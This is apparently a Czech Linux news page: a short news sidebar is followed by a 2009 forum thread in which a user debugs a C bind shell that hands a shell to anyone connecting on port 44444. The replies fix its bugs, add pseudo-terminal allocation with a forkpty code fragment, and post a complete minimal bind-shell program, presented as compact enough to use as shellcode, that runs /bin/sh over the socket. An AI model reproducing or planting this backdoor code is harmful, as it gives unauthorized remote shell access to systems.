Organizace Free Software Foundation Europe (FSFE) zrušila svůj účet na 𝕏 (Twitter) s odůvodněním: "To, co mělo být původně místem pro dialog a výměnu informací, se proměnilo v centralizovanou arénu nepřátelství, dezinformací a ziskem motivovaného řízení, což je daleko od ideálů svobody, za nimiž stojíme". FSFE je aktivní na Mastodonu.
Paramount nabízí za celý Warner Bros. Discovery 30 USD na akcii, tj. celkově o 18 miliard USD více než nabízí Netflix. V hotovosti.
Nájemný botnet Aisuru prolomil další "rekord". DDoS útok na Cloudflare dosáhl 29,7 Tbps. Aisuru je tvořený až čtyřmi miliony kompromitovaných zařízení.
Iced, tj. multiplatformní GUI knihovna pro Rust, byla vydána ve verzi 0.14.0.
FEX, tj. open source emulátor umožňující spouštět aplikace pro x86 a x86_64 na architektuře ARM64, byl vydán ve verzi 2512. Před pár dny FEX oslavil sedmé narozeniny. Hlavní vývojář FEXu Ryan Houdek v oznámení poděkoval společnosti Valve za podporu. Pierre-Loup Griffais z Valve, jeden z architektů stojících za SteamOS a Steam Deckem, v rozhovoru pro The Verge potvrdil, že FEX je od svého vzniku sponzorován společností Valve.
Byla vydána nová verze 2.24 svobodného video editoru Flowblade (GitHub, Wikipedie). Přehled novinek v poznámkách k vydání. Videoukázky funkcí Flowblade na Vimeu. Instalovat lze také z Flathubu.
Společnost Proton AG stojící za Proton Mailem a dalšími službami přidala do svého portfolia online tabulky Proton Sheets v Proton Drive.
O víkendu (15:00 až 23:00) probíha EmacsConf 2025, tj. online konference vývojářů a uživatelů editoru GNU Emacs. Sledovat ji lze na stránkách konference. Záznamy budou k dispozici přímo z programu.
Provozovatel internetové encyklopedie Wikipedia jedná s velkými technologickými firmami o uzavření dohod podobných té, kterou má s Googlem. Snaží se tak zpeněžit rostoucí závislost firem zabývajících se umělou inteligencí (AI) na svém obsahu. Firmy využívají volně dostupná data z Wikipedie k trénování jazykových modelů, což zvyšuje náklady, které musí nezisková organizace provozující Wikipedii sama nést. Automatické programy
… více »Evropská komise obvinila síť 𝕏 z porušení unijních pravidel, konkrétně nařízení Evropské unie o digitálních službách (DSA). Vyměřila jí za to pokutu 120 milionů eur (2,9 miliardy Kč). Pokuta je podle názoru amerického ministra zahraničí útokem zahraničních vlád na americký lid. K pokutě se vyjádřil i americký viceprezident: „EU by měla podporovat svobodu projevu, a ne útočit na americké společnosti kvůli nesmyslům“.
Dobry den,
mam takovyto jednoduchy bindshell napsany v C:
www.qg.ic.cz/a/bindshell.c
Podle me by mel po spusteni fungovat tak, ze bude cekat na portu 44444 a po pripojeni (treba pres telnet) mi preda shell. Narazil jsem vsak na dva problemy:
Spustim program
$ ./bindshell
Pokusim se pripojit na port 44444:
$ telnet localhost 44444 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused
Program neposloucha na portu 44444, divne, podivam se tedy pres nmap, kde ve skutecnosti visi:
$ sudo nmap -sS -p1-65000 localhost Starting Nmap 4.76 ( http://nmap.org ) at 2009-02-07 13:03 CET Interesting ports on localhost.localdomain (127.0.0.1): Not shown: 64997 closed ports PORT STATE SERVICE 40109/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 4.83 seconds
Program je na portu 40109, proc? Zkusim se k nemu tedy pripojit:
$ telnet localhost 40109 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. ls : command not found id : command not found
Nemam shell, pouze "visim" v konzoli. Proc? V sitovem programovani jsem zacatecnik, muze mi prosim nekdo tyto dva jevy objasnit? Budu moc vdecny.
Program je na portu 40109, proc? Zkusim se k nemu tedy pripojit:
man htons
Nemam shell, pouze "visim" v konzoli. Proc?
Tipuju, že shell nedostal proměnné prostředí (posl. parametr execve) - především $PATH a tudíž netuší, kde má hledat binárky.
BTW - argv[0] není cesta, ale pouze basename (tj. spouštět stylem execve("/bin/sh", {"sh", NULL}, environ)).
Na htons jsem uplne zapomnel, dekuji. Porty se uz prirazuji korektne. Program jsem tedy upravil takto:
www.qg.ic.cz/a/bindshell.c
Ale problem s "command not found" stale pretrvava:/
Ale problem s "command not found" stale pretrvava:/
Pokud se přidá parametr -i pro interaktivní shell, tak mi to běhá (ale dost dobře nechápu proč to bez toho nefunguje a proč si myslí, že argv[0] je '').
\r taky zpusobuje iluzi prazdneho jmena tim, ze presouva kurzor na zacatek radku a dalsi vypisovany text prepisuje ten puvodni. Pri pouziti delsiho jmena to je hezky videt."ABCDEFGHIJKLMNOPQRSTUVWXYZ" a zadam prikaz "id", ktery telnet posle jako "id\r", tak shell v mem pripade vypisuje chybu:ABCDEFGHIJKLMNOPQRSTUVWXYZ: line 1: id\r: command not found\n: command not foundTUVWXYZ: line 1: idDekuji, pomohlo to, program jsem tedy upravil, ted uz ma jen jednu mouchu:
$ nc localhost 44444 sh: no job control in this shell sh-3.2$
Jak se prosim zbavim te hlasky "no job control in this shell"
Tak jsem si vsiml, ze tu hlasku to vypisuje pouze pokud bash volam takto:
execle("/bin/bash", "/bin/bash", "-i", NULL, envp);
Pokud ho zavolam takto (bez parametru -i):
execle("/bin/bash", "/bin/bash", NULL, envp);
je to OK. Ja bych tam ten prompt ale potreboval, nenapada vas jak toho dosahnout?
A je nejaka moznost jak mu ten terminal alokovat i kdyz pouzivam interaktivni rezim? Jednoduse zabranit vypisu te hlasky - nevypada to tam pekne.
man 7 pty
man posix_openpt
A jakym zpusobem to zapomponovat do toho programu? Ta funkce vraci file describtor a ten pak presmeruju do toho socketu stejne jako to delam se stdin, stdout a stderr?
Ano, a bash připojíte na slave.
Jaky slave?
Omlouvam se, asi jsem slepy, ale tady:
man posix_openpt
v sekci return value, je ze ta funkce vraci "a non-negative file descriptor which is the lowest numbered unused descriptor", coz je jeden fd. Kde tedy sezenu ten druhy?
$ man pts
...
Unix 98 pseudo-terminals
An unused Unix 98 pseudo-terminal master is opened by calling posix_openpt(3). (This function opens the mas‐
ter clone device, /dev/ptmx; see pts(4).) After performing any program-specific initializations, changing the
ownership and permissions of the slave device using grantpt(3), and unlocking the slave using unlockpt(3)),
the corresponding slave device can be opened by passing the name returned by ptsname(3) in a call to open(2).
...
Tak ja uz se v tom teda nejak nevyznam:-/ Muze mi prosim nejaka dobra duse poradit tak vse vyse zminene naroubuji do tohoto kodu?
...
// redirect
dup2(sock2, 0);
dup2(sock2, 1);
// execute
execle("/bin/bash", "/bash", "-i", NULL, envp);
Zhruba jde o to, že až otevřete ten terminál, tak vytvoříte nový proces, ve kterém na slave toho terminálu píchnete ten shell a v původním procesu budete přesypávat data z masteru do socketu a zpátky. Není to nic složitého, ale psát to za vás nikdo nebude. Na internetu se válí spousta dokumentace a kódu pro inspiraci.
man fork, wait, select, write/read(/send/recv), ...
Pak se taky možná dostanete k signálům pro kontrolu terminálu/procesu a jejich předávání z klienta a buď se na to vykašlete, nebo budete o kus chytřejší :)
forkpty, tak se můžete inspirovat. Případne můžou pánové šťouralové vylepšit.
static void run_terminal(int socket)
{
pid_t p, pp;
int m;
struct winsize ws = { .ws_row = 25, .ws_col = 80,
.ws_xpixel = 0, .ws_ypixel = 0 };
p = forkpty(&m, NULL, NULL, &ws);
if (p < 0) {
error("forkpty");
close(socket);
close(m);
return;
}
if (p > 0) {
pp = fork();
if (pp < 0) {
error("fork");
close(socket);
close(m);
return;
}
if (pp > 0) {
close(socket);
close(m);
return;
}
close(listen_socket);
say("entering copy loop");
copy_loop(m, m, socket, socket);
say("copy loop finished");
kill(p, 1);
exit(0);
} else {
close(listen_socket);
close(socket);
close(m);
say("spawning shell");
execl("/bin/bash", "bash", "-i", "-l", NULL);
bail("execl");
}
}
Skoro mě napadá otázka, na jaké škole se dávají takovéhle úkoly? 
3. telnet do radku pridava \r.Jo, to je ten jednoduchý důvod
Ahoj ja pouzivam tento kod - je kratsi a ve vysledku i uspornejsi jako shellkod:
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc,cli;
struct sockaddr_in serv_addr;
int main(){
serv_addr.sin_family=2;
serv_addr.sin_addr.s_addr=0;
serv_addr.sin_port=0x9CAD; // Toto je to tvoje cislo portu 44444 zapsane v hex a prevracene - cili klasicky --> 0xAD9C ---> AD|9C --> 0x9CAD
soc=socket(2,1,0);
bind(soc,(struct sockaddr *)&serv_addr,0x10);
listen(soc,1);
cli=accept(soc,0,0);
dup2(cli,0);
dup2(cli,1);
dup2(cli,2);
execve("/bin/sh",0,0);
}
jinak doporucuji namisto telnet pouzit nc cili:
nc localhost 44444
soc=socket(2,1,0); atd.) je cesta do pekel. Ten původní kód je přehlednější a nepřijde mi o tolik delší.
Tiskni
Sdílej: